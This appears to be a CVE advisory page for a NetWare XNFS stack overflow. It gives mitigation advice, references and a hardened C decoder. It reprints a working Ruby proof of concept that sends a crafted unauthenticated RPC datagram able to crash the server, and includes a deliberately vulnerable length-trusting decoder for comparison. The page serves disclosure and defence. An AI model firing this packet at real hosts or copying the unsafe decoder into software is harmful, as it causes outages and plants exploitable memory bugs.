CVE-2010-4227
Description
The xdrDecodeString function in XNFS.NLM in Novell NetWare 6.5 before SP8 allows remote attackers to cause a denial of service (abend) or execute arbitrary code via a crafted, signed value (the XDR string length field) in an NFS RPC request to UDP port 1234, leading to a stack-based buffer overflow.
Mitigations
No community-published mitigations for this CVE yet. The description indicates the issue is fixed in Novell NetWare 6.5 SP8 (the vendor download link is listed under References). Until the service pack is applied, restricting access to UDP port 1234 on the NetWare server to trusted NFS clients limits exposure, since the request is reachable without authentication (the PoC below sends AUTH_NULL credentials).
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Novell Netware - RPC XNFS xdrDecodeString
#!/usr/bin/ruby
# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=24&Itemid=24
require 'socket'

netware_server = ARGV[0]
target_port    = (ARGV[1] || 1234)

# ONC RPC v2 CALL for MOUNT (program 100005) version 2, procedure MNT (1),
# followed only by the XDR length field of the dirpath argument. No string
# body is sent; the crafted length is what reaches xdrDecodeString.
beepbeep =
  "\x1c\xd1\xef\xab" +                 # XID
  "\x00\x00\x00\x00" +                 # Message Type: Call (0)
  "\x00\x00\x00\x02" +                 # RPC Version: 2
  "\x00\x01\x86\xa5" +                 # Program: 100005 (MOUNT)
  "\x00\x00\x00\x02" +                 # Program Version: 2
  "\x00\x00\x00\x01" +                 # Procedure: MNT (1)
  "\x00\x00\x00\x00\x00\x00\x00\x00" + # Credentials: AUTH_NULL (flavor 0, length 0)
  "\x00\x00\x00\x00\x00\x00\x00\x00" + # Verifier: AUTH_NULL (flavor 0, length 0)
  "\x41\x42\x43\x44"                   # dirpath length field: crafted value 0x41424344

puts "[+] beep beep"
puts "[+] No, it's not the road runner"

if !(netware_server && target_port)
  puts "Usage: PRL-2011-04.rb host port (default port: 1234)"
  exit
else
  puts "[+] Sending UDP Packet..."
  sock = UDPSocket.open
  sock.connect(netware_server, target_port.to_i)
  sock.send(beepbeep, 0)
  sock.close
end
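The description above says the overflow comes from a trusted, signed XDR string length, and the PoC shows where that length sits in the MOUNT MNT datagram. The following C is an added illustration written for this page, not XNFS.NLM source (which is not public here) and not part of the Exploit-DB entry: it reconstructs the shape of the bug as a decoder that trusts the length, next to a hardened decoder that treats the length as unsigned and bounds it by both the bytes actually received and the destination buffer, then walks the RPC call header to reach the dirpath argument and feeds it the PoC's own bytes plus a constructed benign request. Function names, the 400-byte opaque_auth cap (RFC 5531) and MNTPATHLEN 1024 (RFC 1094) are assumptions for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MNTPATHLEN    1024     /* RFC 1094 cap on a MOUNT dirpath (assumed for this example) */
#define MOUNT_PROG    100005u  /* 0x000186a5, as in the PoC header */
#define MOUNT_V2      2u
#define MOUNTPROC_MNT 1u

/* Read a big-endian 32-bit XDR integer. */
static uint32_t xdr_u32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* XDR pads opaque data to a multiple of four bytes. */
static size_t xdr_pad4(uint32_t n) { return ((size_t)n + 3) & ~(size_t)3; }

/* Shape of the bug the CVE description implies (illustrative reconstruction, not
 * vendor code): the length is read as a signed int and trusted. A large or
 * negative length makes memcpy write far past `out`, which lives on the caller's
 * stack. Shown for comparison only; nothing below calls it with hostile input. */
int decode_xdr_string_trusting(const uint8_t *msg, size_t off, char *out)
{
    int len = (int)xdr_u32(msg + off);
    memcpy(out, msg + off + 4, (size_t)len);
    out[len] = '\0';
    return len;
}

/* Hardened decoder: unsigned length, bounded by what was received and by the
 * destination buffer (leaving room for the NUL). Returns the length or -1. */
int decode_xdr_string(const uint8_t *msg, size_t msglen, size_t off,
                      char *out, size_t outsz)
{
    if (off > msglen || msglen - off < 4 || outsz == 0) return -1;
    uint32_t len = xdr_u32(msg + off);
    if (len > msglen - off - 4) return -1;   /* claims more bytes than were sent */
    if (len >= outsz) return -1;             /* would not fit the destination */
    memcpy(out, msg + off + 4, len);
    out[len] = '\0';
    return (int)len;
}

/* Walk the ONC RPC v2 call header (xid, CALL, rpcvers, prog, vers, proc, two
 * opaque_auth blocks) and return the offset of the procedure arguments, or -1
 * if the header is truncated or this is not a MOUNT v2 MNT call. */
long mnt_args_offset(const uint8_t *msg, size_t msglen)
{
    if (msglen < 40) return -1;
    if (xdr_u32(msg + 4) != 0 || xdr_u32(msg + 8) != 2) return -1;   /* CALL, RPC v2 */
    if (xdr_u32(msg + 12) != MOUNT_PROG || xdr_u32(msg + 16) != MOUNT_V2 ||
        xdr_u32(msg + 20) != MOUNTPROC_MNT) return -1;
    size_t off = 24;                              /* credentials opaque_auth */
    uint32_t cred_len = xdr_u32(msg + off + 4);
    if (cred_len > 400) return -1;                /* RFC 5531 auth body limit (assumed) */
    off += 8 + xdr_pad4(cred_len);
    if (msglen < off + 8) return -1;              /* verifier opaque_auth */
    uint32_t verf_len = xdr_u32(msg + off + 4);
    if (verf_len > 400) return -1;
    off += 8 + xdr_pad4(verf_len);
    if (off > msglen) return -1;
    return (long)off;
}

/* Full check for one datagram: dirpath length on success, -1 when rejected. */
int check_mnt_request(const uint8_t *msg, size_t msglen, char *out, size_t outsz)
{
    long off = mnt_args_offset(msg, msglen);
    if (off < 0) return -1;
    return decode_xdr_string(msg, msglen, (size_t)off, out, outsz);
}

/* The 40-byte RPC header from the PoC above (constructed inline from its bytes). */
static const uint8_t RPC_HDR[40] = {
    0x1c,0xd1,0xef,0xab, 0,0,0,0, 0,0,0,2, 0x00,0x01,0x86,0xa5,
    0,0,0,2, 0,0,0,1, 0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0 };

/* PoC datagram: header plus the crafted length 0x41424344 and no string body. */
int demo_poc(void)
{
    uint8_t msg[44];
    char path[MNTPATHLEN + 1];
    memcpy(msg, RPC_HDR, 40);
    memcpy(msg + 40, "\x41\x42\x43\x44", 4);
    return check_mnt_request(msg, sizeof msg, path, sizeof path);
}

/* Constructed benign request: length 4 followed by the dirpath "/exp". */
int demo_benign(char *path, size_t pathsz)
{
    uint8_t msg[48];
    memcpy(msg, RPC_HDR, 40);
    memcpy(msg + 40, "\x00\x00\x00\x04/exp", 8);
    return check_mnt_request(msg, sizeof msg, path, pathsz);
}

int main(void)
{
    char path[MNTPATHLEN + 1];
    printf("PoC datagram:    %d (rejected)\n", demo_poc());
    printf("benign datagram: %d (%s)\n", demo_benign(path, sizeof path), path);
    return 0;
}
```

The PoC bytes are refused by the first bound (the length claims 0x41424344 bytes while zero remain in the datagram) before the buffer size is even consulted, so a length with the sign bit set is handled the same way as a merely large one; there is no signed comparison for it to slip through.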
References
- http://download.novell.com/Download?buildid=1z3z-OsVCiE~
- http://secunia.com/advisories/43431
- http://securityreason.com/securityalert/8104
- http://www.exploit-db.com/exploits/16234
- http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=24&Itemid=24
- http://www.securityfocus.com/archive/1/516645/100/0/threaded
- http://www.securityfocus.com/bid/46535
- http://www.securitytracker.com/id?1025119
- http://www.vupen.com/english/advisories/2011/0497
- http://www.zerodayinitiative.com/advisories/ZDI-11-090
- https://exchange.xforce.ibmcloud.com/vulnerabilities/65625
CWEs
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer